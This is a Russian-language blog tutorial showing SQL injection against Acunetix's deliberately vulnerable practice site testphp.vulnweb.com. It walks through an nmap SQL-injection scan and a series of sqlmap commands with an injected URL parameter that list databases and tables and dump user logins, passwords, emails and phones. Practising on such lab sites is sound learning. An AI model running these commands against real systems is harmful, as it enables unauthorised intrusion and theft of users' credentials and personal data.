SQL - иньекция на примере сайта Acunetix
На сайте Acunetix есть уязвимости, специально оставленные для пентестеров. Заходим по адресу http://www.vulnweb.com/

Далее, выбираем для атаки адрес http://testphp.vulnweb.com Но шоп добраться до конкретных уязвимых страниц запускаем утилиту nmap вот такой командой
nmap -sV -script=http-sql-injection www. testphp.vulnweb.com -p 80

Список уязвимых страниц получен и выбираем любой понравившийся адрес. Затем запускаем sqlmap командой
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" --dbs

Программулина предупредила о незаконных действиях и что разработчики не несут ответственности за и её использование и начала работу.

2 базы в списке получены.
Шоп равковырять базу acuart, применим команду
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart --tables

Утилита опять предупредила о незаконных действиях и сунула уязвимой странице пейлоад.)))

Нашлось интересное - users.
Вот его и попробуем пошшупать следующей командой.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users --columns

И получаем список ишшо интереснее. В пункте uname, дожны найтись логины юзеров.
Команда sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C uname --dump нам их и покажет

Нашлось! Теперь вытащим пароли из pass такой командой
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C pass --dump

И пароль есть! Далее... команда по вытаскиванию мыл из email
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C email --dump

Мыльник выловлен. А следующая команда покажет телефоны, если они есть
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=4'%20OR%20sqlspider" -D acuart -T users -C phone --dump

Вот и весь взлом. На этом всё.
Комментарии